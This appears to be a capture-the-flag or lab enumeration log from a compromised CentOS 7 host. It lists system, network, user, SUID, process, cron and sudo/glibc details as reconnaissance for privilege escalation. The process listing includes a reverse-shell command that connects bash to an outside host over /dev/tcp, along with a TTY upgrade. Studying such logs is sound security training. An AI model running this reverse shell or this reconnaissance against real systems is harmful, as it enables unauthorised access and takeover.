System/Kernel
bash-4.2$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=85e3da5a087950e7aaeb7893c056218a8874d2e5, stripped
Linux zeno 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.9.2009 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.9.2009 (Core)
CentOS Linux release 7.9.2009 (Core)CentOS Linux 7 (Core)
3.10.0-1160.36.2.el7.x86_64
ELF 64-bit LSB executable
Networks
bash-4.2$ ip route ; arp -a
default via 10.10.0.1 dev eth0
10.10.0.0/16 dev eth0 proto kernel scope link src 10.10.20.195
169.254.0.0/16 dev eth0 scope link metric 1002
bash: arp: command not foundbash-4.2$ ss -tunlp4
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 128 127.0.0.1:9000 *:* users:(("php-fpm",pid=1074,fd=0),("php-fpm",pid=1073,fd=0),("php-fpm",pid=1072,fd=0),("php-fpm",pid=1071,fd=0),("php-fpm",pid=1070,fd=0))
tcp LISTEN 0 50 *:3306 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 127.0.0.1:25 *:*127.0.0.1:9000
*:3306
127.0.0.1:25
Users & Groups
bash-4.2$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
edward:x:1000:1000::/home/edward:/bin/bash
total 0
0 drwxr-xr-x. 3 root root 127 Sep 21 2021 edward
0 drwxr-xr-x. 3 root root 20 Jul 26 2021 .
0 dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..edward
bash-4.2$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=1000(edward) gid=1000(edward) groups=1000(edward)uid=1000(edward) gid=1000(edward) groups=1000(edward)
SUIDs
bash-4.2$ find / -perm -04000 -ls -type f 2>/dev/null
100859607 24 -rws--x--x 1 root root 23968 Feb 2 2021 /usr/bin/chfn
100859614 24 -rws--x--x 1 root root 23880 Feb 2 2021 /usr/bin/chsh
100859648 44 -rwsr-xr-x 1 root root 44264 Feb 2 2021 /usr/bin/mount
100721229 76 -rwsr-xr-x 1 root root 73888 Aug 9 2019 /usr/bin/chage
100721230 80 -rwsr-xr-x 1 root root 78408 Aug 9 2019 /usr/bin/gpasswd
100721233 44 -rwsr-xr-x 1 root root 41936 Aug 9 2019 /usr/bin/newgrp
100859663 32 -rwsr-xr-x 1 root root 32128 Feb 2 2021 /usr/bin/su
100859667 32 -rwsr-xr-x 1 root root 31984 Feb 2 2021 /usr/bin/umount
101040236 144 ---s--x--x 1 root root 147336 Jan 26 2021 /usr/bin/sudo
100937059 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
100937266 60 -rwsr-xr-x 1 root root 57656 Aug 9 2019 /usr/bin/crontab
101040418 28 -rwsr-xr-x 1 root root 27856 Apr 1 2020 /usr/bin/passwd
103697 12 -rwsr-xr-x 1 root root 11232 Apr 1 2020 /usr/sbin/pam_timestamp_check
103699 36 -rwsr-xr-x 1 root root 36272 Apr 1 2020 /usr/sbin/unix_chkpwd
279716 12 -rwsr-xr-x 1 root root 11296 Nov 16 2020 /usr/sbin/usernetctl
67420087 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
67420080 60 -rwsr-x--- 1 root dbus 57936 Sep 30 2020 /usr/libexec/dbus-1/dbus-daemon-launch-helperSGIDs
bash-4.2$ find / -perm -02000 -ls -type f 2>/dev/null
7928 0 drwxr-sr-x 3 root systemd-journal 60 Aug 13 12:52 /run/log/journal
7929 0 drwxr-s--- 2 root systemd-journal 60 Aug 13 12:52 /run/log/journal/12b8f3b650c474458eabe94bf9cca450
100721502 16 -r-xr-sr-x 1 root tty 15344 Jun 10 2014 /usr/bin/wall
100859673 20 -rwxr-sr-x 1 root tty 19544 Feb 2 2021 /usr/bin/write
100812641 376 ---x--s--x 1 root nobody 382216 Aug 9 2019 /usr/bin/ssh-agent
279610 12 -rwxr-sr-x 1 root root 11224 Nov 16 2020 /usr/sbin/netreport
13991 216 -rwxr-sr-x 1 root postdrop 218560 Apr 1 2020 /usr/sbin/postdrop
13998 260 -rwxr-sr-x 1 root postdrop 264128 Apr 1 2020 /usr/sbin/postqueue
67407075 12 -rwx--s--x 1 root utmp 11192 Jun 10 2014 /usr/libexec/utempter/utempter
100937256 456 ---x--s--x 1 root ssh_keys 465760 Aug 9 2019 /usr/libexec/openssh/ssh-keysignProcesses
bash-4.2$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.2 0.7 128016 3680 ? Ss 12:52 0:15 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 456 0.0 0.3 34960 1876 ? Ss 12:53 0:02 /usr/lib/systemd/systemd-journald
root 473 0.0 0.0 192908 324 ? Ss 12:53 0:00 /usr/sbin/lvmetad -f
root 488 0.0 0.1 48628 924 ? Ss 12:53 0:02 /usr/lib/systemd/systemd-udevd
root 593 0.0 0.0 55532 348 ? S<sl 12:53 0:00 /sbin/auditd
polkitd 612 0.0 0.2 613024 1328 ? Ssl 12:53 0:00 /usr/lib/polkit-1/polkitd --no-debug
dbus 614 0.0 0.2 66452 1212 ? Ssl 12:53 0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 622 0.0 0.2 26384 1120 ? Ss 12:53 0:00 /usr/lib/systemd/systemd-logind
root 625 0.0 0.1 126392 572 ? Ss 12:53 0:05 /usr/sbin/crond -n
root 638 0.1 0.4 358840 2140 ? Ssl 12:53 0:09 /usr/bin/python2 -Es /usr/sbin/firewalld --nofork --nopid
root 641 0.0 0.5 474176 2640 ? Ssl 12:53 0:01 /usr/sbin/NetworkManager --no-daemon
root 945 0.0 0.1 102944 816 ? Ss 12:54 0:00 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient--eth0.lease -pf /var/run/dhclient-eth0.pid -H zeno eth0
root 1004 0.1 1.6 355000 8240 ? Ss 12:54 0:08 /usr/sbin/httpd -DFOREGROUND
root 1010 0.0 0.2 272632 1176 ? Ss 12:54 0:01 php-fpm: master process (/etc/php-fpm.conf)
root 1013 0.0 0.5 574288 2492 ? Ssl 12:54 0:04 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 1014 0.0 0.1 112940 900 ? Ss 12:54 0:00 /usr/sbin/sshd -D
root 1015 0.0 0.4 218644 2348 ? Ssl 12:54 0:01 /usr/sbin/rsyslogd -n
root 1068 0.0 0.0 110208 360 tty1 Ss+ 12:54 0:00 /sbin/agetty --noclear tty1 linux
apache 1070 0.0 0.1 272632 516 ? S 12:54 0:00 php-fpm: pool www
apache 1071 0.0 0.1 272632 512 ? S 12:54 0:00 php-fpm: pool www
apache 1072 0.0 0.1 272632 512 ? S 12:54 0:00 php-fpm: pool www
apache 1073 0.0 0.1 272632 536 ? S 12:54 0:00 php-fpm: pool www
apache 1074 0.0 0.1 272632 524 ? S 12:54 0:00 php-fpm: pool www
mysql 1085 0.0 0.0 113416 328 ? Ss 12:54 0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
root 1178 0.0 0.0 110208 360 ttyS0 Ss+ 12:54 0:00 /sbin/agetty --keep-baud 115200,38400,9600 ttyS0 vt220
mysql 1351 0.6 11.2 1170868 56124 ? Sl 12:54 0:47 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
root 1586 0.0 0.3 89748 1596 ? Ss 12:54 0:00 /usr/libexec/postfix/master -w
postfix 1591 0.0 0.3 90028 1592 ? S 12:55 0:00 qmgr -l -t unix -u
apache 6276 0.0 1.9 355472 9552 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6278 0.0 1.9 355420 9496 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6303 0.0 1.7 355000 8716 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6309 0.0 1.8 355804 9408 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6379 0.0 1.8 355136 9220 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6407 0.0 1.9 355132 9452 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6433 0.0 1.8 355132 9060 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6445 0.0 1.7 355000 8516 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6460 0.0 1.8 355408 9180 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
apache 6466 0.0 1.7 355000 8720 ? S 14:29 0:00 /usr/sbin/httpd -DFOREGROUND
postfix 6487 0.0 0.8 89852 4080 ? S 14:32 0:00 pickup -l -t unix -u
apache 6523 0.0 0.2 11692 1404 ? S 14:50 0:00 sh -c 0<&196;exec 196<>/dev/tcp/10.9.0.243/9999; bash <&196 >&196 2>&196
apache 6524 0.0 0.2 11688 1368 ? S 14:50 0:00 bash
apache 6529 0.0 0.1 10604 752 ? S 14:52 0:00 script /dev/null -c bash
apache 6531 0.0 0.0 10608 372 ? S 14:52 0:00 script /dev/null -c bash
apache 6532 0.0 0.3 11824 1812 pts/0 Ss 14:52 0:00 bash
apache 6641 0.0 0.3 51732 1716 pts/0 R+ 14:57 0:00 ps -auxwww/usr/sbin/lvmetad -f
/sbin/auditd
/usr/lib/polkit-1/polkitd --no-debug
/usr/sbin/crond -n
/usr/bin/python2 -Es /usr/sbin/firewalld --nofork --nopid
/usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
/usr/libexec/postfix/master -w
qmgr -l -t unix -u
pickup -l -t unix -u
Cron & Systemd
bash-4.2$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for apache
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
NEXT LEFT LAST PASSED
Wed 2024-08-14 13:07:24 CEST 22h left Tue 2024-08-13 13:07:24 CEST 1h 52min ag
1 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-5/5 (END)Sudo Version
bash-4.2$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23Sudo version 1.8.23
Glibc Version
bash-4.2$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (GNU libc) 2.17